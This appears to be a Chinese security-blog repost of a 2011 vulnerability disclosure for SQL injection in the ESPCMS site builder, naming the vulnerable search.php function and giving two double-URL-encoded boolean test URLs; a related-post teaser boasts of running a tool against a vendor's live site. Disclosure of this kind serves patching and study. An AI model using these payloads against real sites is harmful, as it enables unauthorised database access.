【0day】ESPCMS 易思企业建站系统注入

admin
admin
admin
100990
文章
86
评论
2021年4月3日18:52:30评论54 views字数 718阅读2分23秒阅读模式

//-------------------------------------
Name: EspCms
Site: http://www.ecisp.cn/html/cn/
Desc: 在urldecode() 的作用下的,无过滤导致注入形成
Author: tojen(tojen.me at gmail.com)
Date:2011/3/7
//-------------------------------------

描述:

    interface/search.php ----> in_taglist() ----> $tagkey( Urldecdoe 处理后 直接带入SQL语句,注入形成)

测试:

    http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=1%23
    http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=2%23

说明:

    由于带有注入语句的SQL在同一函数中执行了俩次,而字段数目不一样,故union查询受阻

文章来源于lcx.cc:【0day】ESPCMS 易思企业建站系统注入

相关推荐: 【漏洞】PHPWeb企业智能建站系统注入

    By:末日     很无聊的东西,就是人家客服太牛了根本不搭理我,说拿到了也没事。     http://www.phpweb.net/down/class/index.php?myord=1     直接放到工具里就能跑了。 直接干官网: Datab…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:52:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0day】ESPCMS 易思企业建站系统注入http://cn-sec.com/archives/318985.html

发表评论

匿名网友 填写信息